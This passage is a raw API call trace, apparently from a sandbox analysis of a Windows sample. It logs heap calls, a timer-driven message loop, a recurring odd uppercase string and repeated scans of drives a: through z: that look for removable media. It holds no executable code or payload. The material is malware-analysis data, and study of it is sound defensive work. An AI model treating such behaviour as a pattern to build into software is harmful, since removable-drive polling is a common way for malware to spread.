lpMsg=0x7dfb8c) returned 1 [0220.822] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.822] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.822] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.822] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.822] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0220.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0220.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0220.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0220.876] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.876] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.876] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.876] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.876] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.877] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0220.877] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.877] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.877] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.877] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.878] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.879] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.879] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.879] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.879] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.879] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.880] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.881] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.881] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.881] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.881] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.882] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.882] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.882] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.882] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.883] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.883] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.883] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.884] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.884] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.884] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.884] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.884] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.885] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0220.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0220.886] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0220.886] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.887] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0220.887] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0220.887] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0220.887] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.887] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.887] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.888] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.888] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.888] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0220.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.889] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.889] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.889] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.889] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.889] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.890] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.890] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.890] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.890] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.890] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.891] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.891] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.891] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.891] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.891] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.892] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.892] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.892] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.892] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.892] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.893] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.893] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.893] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.893] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.894] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.894] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.894] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.894] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.894] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.894] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.894] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.895] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0220.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0220.896] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0220.896] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.897] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.897] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0220.897] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0220.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.898] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0220.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.898] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.898] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.899] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.899] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.899] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.899] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.899] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.900] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.900] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.900] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.900] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.900] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.901] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.901] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.901] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.901] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.902] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.902] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.902] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.902] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.902] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.903] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.903] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.903] GetDriveTypeW (lpRootPathName="w:\\") returned 